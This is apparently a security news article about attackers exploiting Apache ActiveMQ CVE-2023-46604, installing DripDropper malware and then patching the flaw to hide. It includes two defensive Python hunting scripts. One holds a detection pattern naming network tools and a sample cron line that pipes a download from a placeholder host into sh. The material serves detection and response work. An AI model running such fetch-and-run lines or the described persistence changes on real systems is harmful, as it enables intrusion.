Hackers Exploit ActiveMQ Flaw, Patch Servers to Stay Hidden
Attackers use CVE-2023-46604 to breach Linux cloud hosts, drop “DripDropper” malware, and quietly fix the flaw to lock in access, researchers say.
Threat actors are abusing a two-year-old Apache ActiveMQ remote-code-execution bug (CVE-2023-46604) to compromise cloud Linux systems, deploy a loader dubbed DripDropper, and then patch the very vulnerability used for entry. The self-patching move reduces noise in scans and crowds out rival intruders, according to Red Canary. (Red Canary, NVD)
SAN FRANCISCO — Aug. 19, 2025. Attackers are actively exploiting CVE-2023-46604, a critical Apache ActiveMQ OpenWire deserialization flaw (CVSS 10.0), to gain shell access on Linux servers before installing new malware and applying an official patch to conceal their entry point, threat hunters reported Tuesday. (NVD, Red Canary)
Exploit vector: CVE-2023-46604 (CVSS 10.0), an unauthenticated deserialization bug in ActiveMQ’s OpenWire protocol, enables arbitrary command execution on targeted brokers or clients.
Observed tooling: Attackers deploy DripDropper, a PyInstaller-packed ELF loader that communicates with Dropbox APIs using embedded OAuth tokens, allowing staging of further payloads.
Persistence measures: Intruders enable root SSH login by modifying sshd_config, alter cron jobs (editing /etc/cron.* entries like 0anacron), and change default Linux user shells (e.g., switching the “games” user to /bin/sh).
Post-exploitation patching: Attackers fetch patched JARs directly from Apache Maven (repo1.maven.org), replacing vulnerable components to eliminate scanner-detectable artifacts while maintaining persistence via backdoors.
C2 infrastructure: Campaigns use Sliver C2 frameworks and Cloudflare Tunnels, blending malicious traffic with legitimate encrypted flows.
“It may seem counterintuitive… but it’s a great way to lock out other adversaries and obscure the initial access technique,” Red Canary’s Christina Johns, Chris Brook and Tyler Edmonds wrote. (Red Canary)
“Patching the vulnerability does not disrupt their operations as they already established other persistence mechanisms,” the researchers added. (Red Canary)
Apache advises: “Users of both ActiveMQ Classic and ActiveMQ Artemis brokers are recommended to upgrade.” (activemq.apache.org)
Technical analysis
Vulnerability mechanics. CVE-2023-46604 abuses unbounded deserialization in the Java OpenWire marshaller. A network-adjacent attacker can coerce a broker or client to instantiate arbitrary classes and execute shell commands. Affected 5.x/6.x lines were fixed in 5.15.16 / 5.16.7 / 5.17.6 / 5.18.3 and later. (NVD, activemq.apache.org)
Kill chain observed. Red Canary saw reconnaissance across dozens of cloud-hosted Linux endpoints and exploitation of the RCE, followed by: enabling root SSH login via sshd_config; dropping DripDropper; creating cron-based persistence (editing 0anacron in /etc/cron.*); and modifying the “games” user’s login shell to /bin/sh for fallback access. Finally, the attackers fetched patched JARs from repo1.maven.org to close CVE-2023-46604. (Red Canary)
Command-and-control. DripDropper communicates with Dropbox using a hard-coded bearer token; separate C2 was observed via Sliver and Cloudflare Tunnels, blending into legitimate traffic. (Red Canary)
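A hunt for the host-level persistence artifacts the kill chain above lists (root login enabled in sshd_config, a tampered 0anacron, a login shell on the games account). This is an added example written for this article, not Red Canary's tooling; it takes file contents as text so it can run on copies pulled from a host, and the sample files and the cron download markers are constructed heuristics, not campaign indicators.

```python
import re
# Shells that give an interactive login; system accounts such as "games" normally carry a nologin shell.
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/sh", "/usr/bin/bash"}
# Heuristic markers of payload staging inside a cron script; a stock 0anacron only invokes anacron.
CRON_MARKERS = re.compile(r"\b(curl|wget|base64|python3?|perl)\b|/dev/tcp/|\bbash -c\b", re.I)

def sshd_permits_root(sshd_config: str) -> bool:
    """OpenSSH honours the first PermitRootLogin directive it parses; the intruders set it to 'yes'."""
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"(?i)permitrootlogin\s+(\S+)", line)
        if m:
            return m.group(1).lower() == "yes"
    return False  # default on current OpenSSH is prohibit-password

def system_accounts_with_login_shell(passwd: str, uid_ceiling: int = 1000) -> list:
    """System accounts (UID below uid_ceiling, root excluded) whose shell permits interactive login."""
    hits = []
    for line in passwd.splitlines():
        f = line.split(":")
        if (len(f) == 7 and f[2].isdigit() and f[0] != "root"
                and int(f[2]) < uid_ceiling and f[6] in INTERACTIVE_SHELLS):
            hits.append((f[0], f[6]))
    return hits

def suspicious_cron_lines(cron_script: str) -> list:
    """Non-comment lines of a cron script that match the download/exec markers."""
    return [ln.strip() for ln in cron_script.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and CRON_MARKERS.search(ln)]

def hunt(sshd_config: str, passwd: str, cron_script: str) -> dict:
    """Run all three checks over text copied from a host and return the findings."""
    return {"root_ssh_login": sshd_permits_root(sshd_config),
            "system_accounts_with_login_shell": system_accounts_with_login_shell(passwd),
            "cron_download_lines": suspicious_cron_lines(cron_script)}

# Constructed samples standing in for files copied off a suspect host (not real campaign artifacts).
SAMPLE_SSHD = "# PermitRootLogin no\nPermitRootLogin yes\nPasswordAuthentication yes\n"
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
                 "games:x:5:60:games:/usr/games:/bin/sh\n"
                 "alice:x:1000:1000::/home/alice:/bin/bash\n")
SAMPLE_0ANACRON = ("#!/bin/sh\n# Run anacron if it is not already running\n"
                   "test -x /usr/sbin/anacron || exit 0\n/usr/sbin/anacron -s\n"
                   "curl -s https://example.invalid/stage | sh\n")

if __name__ == "__main__":
    for check, finding in hunt(SAMPLE_SSHD, SAMPLE_PASSWD, SAMPLE_0ANACRON).items():
        print(f"{check}: {finding}")
```

Feed it the real /etc/ssh/sshd_config, /etc/passwd and each script under /etc/cron.* from the host under review; any non-empty finding warrants a timeline of who changed the file and when.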
Impact & response
Who’s affected: Any organization exposing vulnerable ActiveMQ brokers/clients—especially in cloud Linux environments used by CI/CD, microservices, or messaging pipelines. Historical abuse of this bug includes ransomware and cryptomining crews, raising the risk of lateral movement and data theft. (Red Canary, Trend Micro, Rapid7)
Immediate actions:
- Verify provenance of patches. Confirm who applied the fix and when; don’t rely solely on a “clean” scan given the self-patch tactic. (Red Canary)
- Upgrade to a fixed version of ActiveMQ and restart services to load new JARs. (activemq.apache.org)
- Hunt for persistence: check sshd_config (root login), unexpected cron entries (e.g., 0anacron edits), anomalous users or shell changes (e.g., the games account), and outbound traffic to Dropbox, Sliver, or Cloudflare Tunnels. (Red Canary)
- Rotate credentials and review access tokens and API keys on affected hosts.
- Restrict exposure: put brokers behind VPNs or allow-lists; prefer mutual TLS; segment from crown-jewel networks.
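One way to act on the first two items above, checking ActiveMQ JAR versions against the fixed releases quoted in the technical analysis and flagging fixed JARs whose modification time matches no approved change window (the signature of a patch nobody on the team applied). Added example for this article, not Apache's or Red Canary's code; it assumes the usual activemq-<artifact>-<major>.<minor>.<patch>.jar naming, treats 5.x branches older than 5.15 as unfixed and everything else outside the listed branches as fixed, and the lib/ listing and change windows are constructed.

```python
import re
from datetime import datetime, timezone

# Fix versions from the Apache advisory cited above; every earlier release of each branch is vulnerable.
FIXED_BY_BRANCH = {(5, 15): (5, 15, 16), (5, 16): (5, 16, 7), (5, 17): (5, 17, 6), (5, 18): (5, 18, 3)}
# Assumption: ActiveMQ Classic JARs are named <artifact>-<major>.<minor>.<patch>.jar, e.g. activemq-client-5.18.3.jar.
JAR_NAME = re.compile(r"^activemq-[a-z-]+-(\d+)\.(\d+)\.(\d+)\.jar$")

def parse_version(version: str) -> tuple:
    """'5.17.5' -> (5, 17, 5); missing components are padded with 0 so tuples compare cleanly."""
    parts = [int(p) for p in version.split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def is_vulnerable(version: str) -> bool:
    """True when a 5.x release predates its branch's fix. Assumption: branches below 5.15 never
    received a fix; non-5.x versions and branches not listed are treated as fixed (confirm against the advisory)."""
    major, minor, _ = v = parse_version(version)
    if major != 5:
        return False
    fixed = FIXED_BY_BRANCH.get((major, minor))
    return minor < 15 if fixed is None else v < fixed

def review_jars(jar_entries: list, change_windows: list) -> dict:
    """Split ActiveMQ JARs into ones still needing an upgrade and fixed ones whose mtime falls inside
    no approved change window; the latter is what a self-patched host looks like on disk."""
    needs_upgrade, unexplained_patch = [], []
    for name, mtime in jar_entries:
        m = JAR_NAME.match(name)
        if not m:
            continue  # not an ActiveMQ artifact
        if is_vulnerable(".".join(m.groups())):
            needs_upgrade.append(name)
        elif not any(start <= mtime <= end for start, end in change_windows):
            unexplained_patch.append(name)
    return {"needs_upgrade": needs_upgrade, "unexplained_patch": unexplained_patch}

# Constructed sample: a broker's lib/ listing (name, mtime) and the change record's approved windows.
UTC = timezone.utc
SAMPLE_JARS = [("activemq-client-5.18.3.jar", datetime(2025, 8, 10, 3, 12, tzinfo=UTC)),
               ("activemq-broker-5.18.3.jar", datetime(2025, 8, 10, 3, 12, tzinfo=UTC)),
               ("activemq-openwire-legacy-5.17.5.jar", datetime(2023, 6, 1, tzinfo=UTC)),
               ("jackson-core-2.15.2.jar", datetime(2023, 6, 1, tzinfo=UTC))]
SAMPLE_WINDOWS = [(datetime(2024, 1, 15, 20, 0, tzinfo=UTC), datetime(2024, 1, 15, 23, 0, tzinfo=UTC))]

if __name__ == "__main__":
    print(review_jars(SAMPLE_JARS, SAMPLE_WINDOWS))
```

In practice the JAR list comes from os.scandir over the broker's lib/ directory and the windows from the change-management system; a JAR at 5.18.3 with a 03:12 mtime and no ticket is the finding to escalate.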
Background and trendlines
CVE-2023-46604 has been widely exploited since disclosure, with reports tying it to Kinsing cryptominers and ransomware families such as TellYouThePass, HelloKitty, and RansomHub. Red Canary notes the self-patching tactic echoes other campaigns where intruders “fix” entry points to evade scans and monopolize access. (Trend Micro, Red Canary)
Notably, Apache ActiveMQ also saw a 2025 DoS-class issue (CVE-2025-27533) affecting multiple branches—underscoring the need for continuous maintenance even as old RCEs remain favored by attackers. (NVD)
“This attack illustrates a dangerous new phase in exploitation. By patching the very hole they used, adversaries are not only evading defenders’ scanners but also effectively claiming ‘ownership’ of the compromised host. For defenders, a patched system no longer equates to a clean system,” said El Mostafa Ouchen, cybersecurity author and consultant. “In my view, organizations must treat every post-exploitation patch scenario as a full breach requiring deep forensic validation — otherwise, they are leaving sophisticated backdoors untouched.”
Conclusion
The DripDropper campaign is a reminder that patching ≠ clean: an up-to-date broker can still hide entrenched adversaries. Treat exploitation of CVE-2023-46604 as a potential full-environment compromise, validate patch provenance, and expand hunts to persistence, credentials, and egress pathways. (Red Canary)